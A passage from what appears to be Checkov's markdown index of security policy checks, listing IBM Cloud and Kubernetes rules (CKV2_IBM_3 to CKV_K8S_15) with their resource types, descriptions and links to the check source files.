CKV2_IBM_3 | resource | ibm_iam_account_settings | Ensure API key creation is restricted in account settings | Terraform | [IBM_RestrictAPIkeyCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictAPIkeyCreationInAccountSettings.yaml) | +| 2491 | CKV2_IBM_4 | resource | ibm_iam_account_settings | Ensure Multi-Factor Authentication (MFA) is enabled at the account level | Terraform | [IBM_EnableMFAatAccountLevel.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_EnableMFAatAccountLevel.yaml) | +| 2492 | CKV2_IBM_5 | resource | ibm_iam_account_settings | Ensure Service ID creation is restricted in account settings | Terraform | [IBM_RestrictServiceIDCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictServiceIDCreationInAccountSettings.yaml) | +| 2493 | CKV2_IBM_6 | resource | ibm_database | Ensure Databases network access is restricted to a specific IP range | Terraform | [IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml) | +| 2494 | CKV2_IBM_7 | resource | ibm_container_cluster | Ensure Kubernetes clusters are accessible by using private endpoint and NOT public endpoint | Terraform | [IBM_K8sClustersAccessibleViaPrivateEndPt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_K8sClustersAccessibleViaPrivateEndPt.yaml) | +| 2495 | CKV_K8S_1 | resource | PodSecurityPolicy | Do not admit containers wishing to share the host process ID namespace | Kubernetes | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPIDPSP.py) | +| 2496 | CKV_K8S_1 | resource | kubernetes_pod_security_policy | Do not 
admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPIDPSP.py) | +| 2497 | CKV_K8S_2 | resource | PodSecurityPolicy | Do not admit privileged containers | Kubernetes | [PrivilegedContainersPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainersPSP.py) | +| 2498 | CKV_K8S_2 | resource | kubernetes_pod_security_policy | Do not admit privileged containers | Terraform | [PrivilegedContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainerPSP.py) | +| 2499 | CKV_K8S_3 | resource | PodSecurityPolicy | Do not admit containers wishing to share the host IPC namespace | Kubernetes | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPCPSP.py) | +| 2500 | CKV_K8S_3 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPCPSP.py) | +| 2501 | CKV_K8S_4 | resource | PodSecurityPolicy | Do not admit containers wishing to share the host network namespace | Kubernetes | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespacePSP.py) | +| 2502 | CKV_K8S_4 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespacePSP.py) | +| 2503 | CKV_K8S_5 | resource | PodSecurityPolicy | Containers should not run with allowPrivilegeEscalation 
| Kubernetes | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalationPSP.py) | +| 2504 | CKV_K8S_5 | resource | kubernetes_pod_security_policy | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalationPSP.py) | +| 2505 | CKV_K8S_6 | resource | PodSecurityPolicy | Do not admit root containers | Kubernetes | [RootContainersPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersPSP.py) | +| 2506 | CKV_K8S_6 | resource | kubernetes_pod_security_policy | Do not admit root containers | Terraform | [RootContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/RootContainerPSP.py) | +| 2507 | CKV_K8S_7 | resource | PodSecurityPolicy | Do not admit containers with the NET_RAW capability | Kubernetes | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilitiesPSP.py) | +| 2508 | CKV_K8S_7 | resource | kubernetes_pod_security_policy | Do not admit containers with the NET_RAW capability | Terraform | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilitiesPSP.py) | +| 2509 | CKV_K8S_8 | resource | DaemonSet | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2510 | CKV_K8S_8 | resource | Deployment | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2511 | CKV_K8S_8 | resource | DeploymentConfig | Liveness 
Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2512 | CKV_K8S_8 | resource | Pod | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2513 | CKV_K8S_8 | resource | PodTemplate | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2514 | CKV_K8S_8 | resource | ReplicaSet | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2515 | CKV_K8S_8 | resource | ReplicationController | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2516 | CKV_K8S_8 | resource | StatefulSet | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2517 | CKV_K8S_8 | resource | kubernetes_deployment | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | +| 2518 | CKV_K8S_8 | resource | kubernetes_deployment_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | +| 2519 | CKV_K8S_8 | resource | kubernetes_pod | Liveness Probe Should be Configured | Terraform | 
[LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | +| 2520 | CKV_K8S_8 | resource | kubernetes_pod_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | +| 2521 | CKV_K8S_9 | resource | DaemonSet | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2522 | CKV_K8S_9 | resource | Deployment | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2523 | CKV_K8S_9 | resource | DeploymentConfig | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2524 | CKV_K8S_9 | resource | Pod | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2525 | CKV_K8S_9 | resource | PodTemplate | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2526 | CKV_K8S_9 | resource | ReplicaSet | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2527 | CKV_K8S_9 | resource | ReplicationController | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2528 | CKV_K8S_9 | 
resource | StatefulSet | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2529 | CKV_K8S_9 | resource | kubernetes_deployment | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | +| 2530 | CKV_K8S_9 | resource | kubernetes_deployment_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | +| 2531 | CKV_K8S_9 | resource | kubernetes_pod | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | +| 2532 | CKV_K8S_9 | resource | kubernetes_pod_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | +| 2533 | CKV_K8S_10 | resource | CronJob | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2534 | CKV_K8S_10 | resource | DaemonSet | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2535 | CKV_K8S_10 | resource | Deployment | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2536 | CKV_K8S_10 | resource | DeploymentConfig | CPU requests should be set | Kubernetes | 
[CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2537 | CKV_K8S_10 | resource | Job | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2538 | CKV_K8S_10 | resource | Pod | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2539 | CKV_K8S_10 | resource | PodTemplate | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2540 | CKV_K8S_10 | resource | ReplicaSet | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2541 | CKV_K8S_10 | resource | ReplicationController | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2542 | CKV_K8S_10 | resource | StatefulSet | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2543 | CKV_K8S_10 | resource | kubernetes_deployment | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | +| 2544 | CKV_K8S_10 | resource | kubernetes_deployment_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | +| 2545 | CKV_K8S_10 | resource | kubernetes_pod | CPU requests should be set | Terraform | 
[CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | +| 2546 | CKV_K8S_10 | resource | kubernetes_pod_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | +| 2547 | CKV_K8S_11 | resource | CronJob | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2548 | CKV_K8S_11 | resource | DaemonSet | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2549 | CKV_K8S_11 | resource | Deployment | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2550 | CKV_K8S_11 | resource | DeploymentConfig | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2551 | CKV_K8S_11 | resource | Job | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2552 | CKV_K8S_11 | resource | Pod | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2553 | CKV_K8S_11 | resource | PodTemplate | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2554 | CKV_K8S_11 | resource | ReplicaSet | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | 
+| 2555 | CKV_K8S_11 | resource | ReplicationController | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2556 | CKV_K8S_11 | resource | StatefulSet | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2557 | CKV_K8S_11 | resource | kubernetes_deployment | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | +| 2558 | CKV_K8S_11 | resource | kubernetes_deployment_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | +| 2559 | CKV_K8S_11 | resource | kubernetes_pod | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | +| 2560 | CKV_K8S_11 | resource | kubernetes_pod_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | +| 2561 | CKV_K8S_12 | resource | CronJob | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2562 | CKV_K8S_12 | resource | DaemonSet | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2563 | CKV_K8S_12 | resource | Deployment | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2564 | CKV_K8S_12 | 
resource | DeploymentConfig | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2565 | CKV_K8S_12 | resource | Job | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2566 | CKV_K8S_12 | resource | Pod | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2567 | CKV_K8S_12 | resource | PodTemplate | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2568 | CKV_K8S_12 | resource | ReplicaSet | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2569 | CKV_K8S_12 | resource | ReplicationController | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2570 | CKV_K8S_12 | resource | StatefulSet | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2571 | CKV_K8S_12 | resource | kubernetes_deployment | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | +| 2572 | CKV_K8S_12 | resource | kubernetes_deployment_v1 | Memory Limits should be set | Terraform | 
[MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | +| 2573 | CKV_K8S_12 | resource | kubernetes_pod | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | +| 2574 | CKV_K8S_12 | resource | kubernetes_pod_v1 | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | +| 2575 | CKV_K8S_13 | resource | CronJob | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2576 | CKV_K8S_13 | resource | DaemonSet | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2577 | CKV_K8S_13 | resource | Deployment | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2578 | CKV_K8S_13 | resource | DeploymentConfig | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2579 | CKV_K8S_13 | resource | Job | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2580 | CKV_K8S_13 | resource | Pod | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2581 | CKV_K8S_13 | resource | PodTemplate | Memory limits should be set | Kubernetes | 
[MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2582 | CKV_K8S_13 | resource | ReplicaSet | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2583 | CKV_K8S_13 | resource | ReplicationController | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2584 | CKV_K8S_13 | resource | StatefulSet | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2585 | CKV_K8S_13 | resource | kubernetes_deployment | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | +| 2586 | CKV_K8S_13 | resource | kubernetes_deployment_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | +| 2587 | CKV_K8S_13 | resource | kubernetes_pod | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | +| 2588 | CKV_K8S_13 | resource | kubernetes_pod_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | +| 2589 | CKV_K8S_14 | resource | CronJob | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2590 | CKV_K8S_14 | resource | 
DaemonSet | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2591 | CKV_K8S_14 | resource | Deployment | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2592 | CKV_K8S_14 | resource | DeploymentConfig | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2593 | CKV_K8S_14 | resource | Job | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2594 | CKV_K8S_14 | resource | Pod | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2595 | CKV_K8S_14 | resource | PodTemplate | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2596 | CKV_K8S_14 | resource | ReplicaSet | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2597 | CKV_K8S_14 | resource | ReplicationController | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2598 | CKV_K8S_14 | resource | StatefulSet | Image Tag should be fixed - not latest or blank | Kubernetes | 
[ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2599 | CKV_K8S_14 | resource | kubernetes_deployment | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | +| 2600 | CKV_K8S_14 | resource | kubernetes_deployment_v1 | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | +| 2601 | CKV_K8S_14 | resource | kubernetes_pod | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | +| 2602 | CKV_K8S_14 | resource | kubernetes_pod_v1 | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | +| 2603 | CKV_K8S_15 | resource | CronJob | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2604 | CKV_K8S_15 | resource | DaemonSet | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2605 | CKV_K8S_15 | resource | Deployment | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2606 | CKV_K8S_15 | resource | DeploymentConfig | Image Pull Policy should be Always | Kubernetes | 
[ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2607 | CKV_K8S_15 | resource | Job | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2608 | CKV_K8S_15 | resource | Pod | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2609 | CKV_K8S_15 | resource | PodTemplate | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2610 | CKV_K8S_15 | resource | ReplicaSet | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2611 | CKV_K8S_15 | resource | ReplicationController | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2612 | CKV_K8S_15 | resource | StatefulSet | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2613 | CKV_K8S_15 | resource | kubernetes_deployment | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | +| 2614 | CKV_K8S_15 | resource | kubernetes_deployment_v1 | Image Pull Policy should be Always | Terraform | 
